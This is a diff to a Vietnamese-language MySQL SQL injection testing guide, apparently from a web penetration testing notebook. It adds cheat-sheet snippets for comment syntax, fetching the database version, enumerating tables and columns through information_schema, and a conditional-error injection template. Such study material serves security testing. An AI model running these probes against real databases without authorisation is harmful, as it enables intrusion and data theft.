--- a/Web_testing/0.7.Input_Validation_Testing/5.Testing_for_SQL_Injection/5.2.Testing_for_MySQL.md
+++ b/Web_testing/0.7.Input_Validation_Testing/5.Testing_for_SQL_Injection/5.2.Testing_for_MySQL.md
@@ -46,7 +46,33 @@ SELECT * FROM Table WHERE id = '""'; -- "" trả về chuỗi rỗng
 # String concatenation
 
 ```sql
-CONCAT('foo','bar')
+CONCAT('hi','hello')
+```
+
+# Comments
+
+```
+-- comment ( có khoảng trắng sau -- )
+/*comment*/
+```
+
+# Database version
+
+```sql
+SELECT @@version
+```
+
+# Database contents
+
+```sql
+SELECT * FROM information_schema.tables
+SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME'
+```
+
+# Conditional errors
+
+```sql
+SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a')
 ```
 
 # Substring
